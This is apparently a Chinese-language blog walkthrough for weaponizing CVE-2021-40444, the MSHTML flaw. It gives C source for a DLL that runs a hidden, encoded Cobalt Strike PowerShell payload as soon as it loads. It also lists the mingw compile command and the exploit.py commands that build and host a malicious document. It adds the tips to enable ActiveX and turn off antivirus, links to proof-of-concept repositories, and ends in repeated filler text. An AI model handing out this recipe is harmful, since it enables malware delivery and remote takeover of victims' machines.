上一篇的地址:
CVE-2021-40444 MSHTML组件漏洞|附:实现过程
下载编译工具:
1sudo apt-get install gcc-mingw-w64
启动CS客户端和服务端,然后生成payload
1powershell -nop -w hidden -encodedcommand .....(忽略)
构造源文件
1#include <windows.h>
2
3void exec(void) {
4system("powershell -nop -w hidden -encodedcommand .....(忽略)");
5return;
6}
7
8BOOL WINAPI DllMain(
9 HINSTANCE hinstDLL,
10 DWORD fdwReason,
11 LPVOID lpReserved )
12{
13 switch( fdwReason )
14 {
15 case DLL_PROCESS_ATTACH:
16 exec();
17 break;
18
19 case DLL_THREAD_ATTACH:
20 break;
21
22 case DLL_THREAD_DETACH:
23 break;
24
25 case DLL_PROCESS_DETACH:
26 break;
27 }
28 return TRUE;
29}
编译生成生成dll
1i686-w64-mingw32-gcc -shared calc.c -o calc.dll
生成恶意文档
1python3 exploit.py generate test/calc.dll http://192.168.226.128
生产服务端
1sudo python3 exploit.py host 80
在虚拟机里打开生产的恶意文档 成功上线
IE浏览器要启用ActiveX
注意防病毒要关闭
https://xret2pwn.github.io/CVE-2021-40444-Analysis-and-Exploit/
https://github.com/rfcxv/CVE-2021-40444-POC
https://mp.weixin.qq.com/s/hjjLKQCiaVUKWOw1jzQE9A
凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数